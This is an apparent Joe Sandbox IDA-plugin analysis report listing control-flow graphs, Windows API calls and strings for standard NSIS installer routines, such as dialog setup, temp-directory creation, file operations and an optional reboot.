4102 403301 4100->4102 4101->4100 4102->3975 4104 403ed5 4103->4104 4119 405f7d wsprintfW 4104->4119 4106 403f49 4107 406831 18 API calls 4106->4107 4108 403f55 SetWindowTextW 4107->4108 4109 403f70 4108->4109 4110 403f8b 4109->4110 4111 406831 18 API calls 4109->4111 4110->4005 4111->4109 4112->4001 4113->4007 4120 406035 lstrcpynW 4114->4120 4116 403eb4 4117 40674e 3 API calls 4116->4117 4118 403eba lstrcatW 4117->4118 4118->4027 4119->4106 4120->4116 4122 403cbd 4121->4122 4123 4038a2 4122->4123 4124 403cc2 FreeLibrary GlobalFree 4122->4124 4125 406cc7 4123->4125 4124->4123 4124->4124 4126 4067aa 18 API calls 4125->4126 4127 406cda 4126->4127 4128 406ce3 DeleteFileW 4127->4128 4129 406cfa 4127->4129 4168 4038ae CoUninitialize 4128->4168 4130 406e77 4129->4130 4172 406035 lstrcpynW 4129->4172 4136 406301 2 API calls 4130->4136 4156 406e84 4130->4156 4130->4168 4132 406d25 4133 406d39 4132->4133 4134 406d2f lstrcatW 4132->4134 4137 40677d 2 API calls 4133->4137 4135 406d3f 4134->4135 4139 406d4f lstrcatW 4135->4139 4141 406d57 lstrlenW FindFirstFileW 4135->4141 4138 406e90 4136->4138 4137->4135 4142 40674e 3 API calls 4138->4142 4138->4168 4139->4141 4140 4062cf 11 API calls 4140->4168 4145 406e67 4141->4145 4169 406d7e 4141->4169 4143 406e9a 4142->4143 4146 4062cf 11 API calls 4143->4146 4144 405d32 CharNextW 4144->4169 4145->4130 4147 406ea5 4146->4147 4148 405e5c 2 API calls 4147->4148 4149 406ead RemoveDirectoryW 4148->4149 4153 406ef0 4149->4153 4154 406eb9 4149->4154 4150 406e44 FindNextFileW 4152 406e5c FindClose 4150->4152 4150->4169 4152->4145 4155 404f9e 25 API calls 4153->4155 4154->4156 4157 406ebf 4154->4157 4155->4168 4156->4140 4159 4062cf 11 API calls 4157->4159 4158 4062cf 11 API calls 4158->4169 4160 406ec9 4159->4160 4163 404f9e 25 API calls 4160->4163 4161 406cc7 72 API calls 4161->4169 4162 405e5c 2 API calls 4164 406dfa DeleteFileW 4162->4164 4165 406ed3 4163->4165 4164->4169 4166 406c94 42 API calls 4165->4166 4166->4168 4167 404f9e 25 API calls 4167->4150 4168->3910 4168->3911 4169->4144 4169->4150 4169->4158 4169->4161 4169->4162 4169->4167 4170 404f9e 25 API calls 4169->4170 4171 406c94 42 API calls 4169->4171 4173 406035 lstrcpynW 4169->4173 4170->4169 4171->4169 4172->4132 4173->4169 4174->4059 4930 401cb2 4931 40145c 18 API calls 4930->4931 4932 401c54 4931->4932 4933 4062cf 11 API calls 4932->4933 4934 401c64 4932->4934 4935 401c59 4933->4935 4936 406cc7 81 API calls 4935->4936 4936->4934 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4937 402238 4938 40145c 18 API calls 4937->4938 4939 40223e 4938->4939 4940 4062cf 11 API calls 4939->4940 4941 40224b 4940->4941 4942 404f9e 25 API calls 4941->4942 4943 402255 4942->4943 4944 405c6b 2 API calls 4943->4944 4945 40225b 4944->4945 4946 4062cf 11 API calls 4945->4946 4954 4022ac CloseHandle 4945->4954 4951 40226d 4946->4951 4948 4030e3 4949 402283 WaitForSingleObject 4950 402291 GetExitCodeProcess 4949->4950 4949->4951 4953 4022a3 4950->4953 4950->4954 4951->4949 4952 40635e 2 API calls 4951->4952 4951->4954 4952->4949 4956 405f7d wsprintfW 4953->4956 4954->4948 4956->4954 4957 404039 4958 404096 4957->4958 4959 404046 lstrcpynA lstrlenA 4957->4959 4959->4958 4960 404077 4959->4960 4960->4958 4961 404083 GlobalFree 4960->4961 4961->4958 4962 401eb9 4963 401f24 4962->4963 4966 401ec6 4962->4966 4964 401f53 GlobalAlloc 4963->4964 4968 401f28 4963->4968 4970 406831 18 API calls 4964->4970 4965 401ed5 4969 4062cf 11 API calls 4965->4969 4966->4965 4972 401ef7 4966->4972 4967 401f36 4986 406035 lstrcpynW 4967->4986 4968->4967 4971 4062cf 11 API calls 4968->4971 4981 401ee2 4969->4981 4974 401f46 4970->4974 4971->4967 4984 406035 lstrcpynW 4972->4984 4976 402708 4974->4976 4977 402387 GlobalFree 4974->4977 4977->4976 4978 401f06 4985 406035 lstrcpynW 4978->4985 4979 406831 18 API calls 4979->4981 4981->4976 4981->4979 4982 401f15 4987 406035 lstrcpynW 4982->4987 4984->4978 4985->4982 4986->4974 4987->4976

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                      APIs
                                      • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                      • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                      • GetClientRect.USER32(?,?), ref: 004051C2
                                      • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                      • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                      • ShowWindow.USER32(?,00000008), ref: 00405266
                                      • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                      • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                        • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,74DF23A0,00000000), ref: 00406902
                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                      • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                      • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                      • ShowWindow.USER32(00000000), ref: 00405313
                                      • ShowWindow.USER32(?,00000008), ref: 00405318
                                      • ShowWindow.USER32(00000008), ref: 0040535F
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                      • CreatePopupMenu.USER32 ref: 004053A2
                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                      • GetWindowRect.USER32(?,?), ref: 004053CA
                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                      • OpenClipboard.USER32(00000000), ref: 00405437
                                      • EmptyClipboard.USER32 ref: 0040543D
                                      • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                      • GlobalLock.KERNEL32(00000000), ref: 00405453
                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                      • CloseClipboard.USER32 ref: 0040549A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                      • String ID: New install of "%s" to "%s"${
                                      • API String ID: 2110491804-1641061399
                                      • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                      • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                      • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                      • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                      APIs
                                      • #17.COMCTL32 ref: 004038CE
                                      • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                      • OleInitialize.OLE32(00000000), ref: 004038E0
                                        • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                        • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                        • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                      • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                      • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                      • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                      • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                      • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                      • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                      • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                      • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                      • CoUninitialize.COMBASE(?), ref: 00403AFD
                                      • ExitProcess.KERNEL32 ref: 00403B1D
                                      • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                      • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                      • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                      • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                      • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                      • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                      • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                      • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                      • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                      • API String ID: 2435955865-3712954417
                                      • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                      • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                      • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                      • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 809 406301-406315 FindFirstFileW 810 406322 809->810 811 406317-406320 FindClose 809->811 812 406324-406325 810->812 811->812
                                      APIs
                                      • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                      • FindClose.KERNEL32(00000000), ref: 00406318
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: Find$CloseFileFirst
                                      • String ID: jF
                                      • API String ID: 2295610775-3349280890
                                      • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                      • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                      • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                      • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                      APIs
                                      • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                      • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                      • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: AddressHandleLibraryLoadModuleProc
                                      • String ID:
                                      • API String ID: 310444273-0
                                      • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                      • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                      • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                      • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                      APIs
                                      • PostQuitMessage.USER32(00000000), ref: 00401648
                                      • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                      • SetForegroundWindow.USER32(?), ref: 004016CB
                                      • ShowWindow.USER32(?), ref: 00401753
                                      • ShowWindow.USER32(?), ref: 00401767
                                      • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                      • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                      • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                      • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                      • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                      • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                      • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                      • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                      • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                      • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                      Strings
                                      • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                      • Sleep(%d), xrefs: 0040169D
                                      • CreateDirectory: "%s" created, xrefs: 00401849
                                      • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                      • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                      • Rename failed: %s, xrefs: 0040194B
                                      • detailprint: %s, xrefs: 00401679
                                      • Aborting: "%s", xrefs: 0040161D
                                      • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                      • Rename: %s, xrefs: 004018F8
                                      • BringToFront, xrefs: 004016BD
                                      • SetFileAttributes failed., xrefs: 004017A1
                                      • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                      • Jump: %d, xrefs: 00401602
                                      • Rename on reboot: %s, xrefs: 00401943
                                      • Call: %d, xrefs: 0040165A
                                      • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
